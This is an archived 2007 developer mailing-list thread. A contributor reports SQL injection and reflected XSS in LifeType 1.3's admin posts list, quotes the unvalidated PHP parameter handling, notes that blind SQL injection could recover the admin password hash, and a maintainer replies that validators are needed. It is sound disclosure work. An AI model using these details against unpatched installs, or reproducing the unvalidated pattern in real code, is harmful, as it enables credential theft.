[pLog-svn] [Lifetype] Multiple SQL Injections in Admin Posts Listinterfaces & a XSS vuln

Mark Wu markplace at gmail.com
Tue Jul 17 00:59:30 EDT 2007 

mmmm ... For this issue.
 
Then, I think we should add validator to each parameters ... :(
 
Mark

  _____  

From: plog-svn-bounces at devel.lifetype.net
[mailto:plog-svn-bounces at devel.lifetype.net] On Behalf Of Matt Wood
Sent: Tuesday, July 17, 2007 10:31 AM
To: plog-svn at devel.lifetype.net
Subject: [pLog-svn] [Lifetype] Multiple SQL Injections in Admin Posts
Listinterfaces & a XSS vuln


I was playing with the new ajax "build" earlier today and the new pretty YUI
components and found a couple problems with stuff unrelated & related to the
ajax stuff [which I noticed that most inputs were verified by oscar :), from
those plog-svn change-sets]. 

I've verified these attacks work but truthfully the only important cases
exist when you allow public registration for a blog through the lifetype
core (or have an untrusted user base), since in order to exploit these
vulnerabilities you must have a valid session. 

There are many parameters passed into AdminPostsListView from
AdminEditPostsAction.class.php which are not validated and lead to SQL
injection attacks (recovering the admin's md5 password hash for example).

in the performAjax() and perform() methods
---
lifetype-1.3-ajax/class/action/admin/admineditpostsaction.class.php:

                  "showMonth" => $this->_request->getValue( "showMonth" ), 
---
which is passed into the following, again unverified...
---
lifetype-1.3-ajax/class/view/admin/adminpostslistview.class.php:
$thi
s->_showMonth = $this->_getParameter( $params, "showMonth",
$this->_locale->form 
atDate( new Timestamp(), "%Y%m" ));
---
This leads to sql injection on almost all of the variables here... You can
easily verify this by checking the mysql logs and by looking at the query
string before its sent to the database. Since this injection is in the WHERE
clause where many bad things can occur. The most pervasive of which are
blindsql attacks on the password hashes. 


These parameters are also echo'ed onto the web page unfiltered... 
---
lifetype-1.3-ajax/class/view/admin/adminpostslistview.class.php:

        $pager = new Pager(
"?op=editPosts&showMonth={$this->_showMonth}&amp 
;showStatus={$this->_showStatus}&showCategory={$this->_showCategory}&amp
;sho
wUser={$this->_showUser}&searchTerms={$this->_searchTerms}&showLocat
ion=
{$this->_locationId}&page=" 
---
leading to XSS with some clever parameters that require the pager to
actually display links.


On the severity...
The xss vuln not really that important... but even with a semi-trusted
userbase the sql injections could lead to the admin having his password
discovered. 


-Matt

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://limedaley.com/pipermail/plog-svn/attachments/20070717/8765bffe/attachment.htm

More information about the pLog-svn mailing list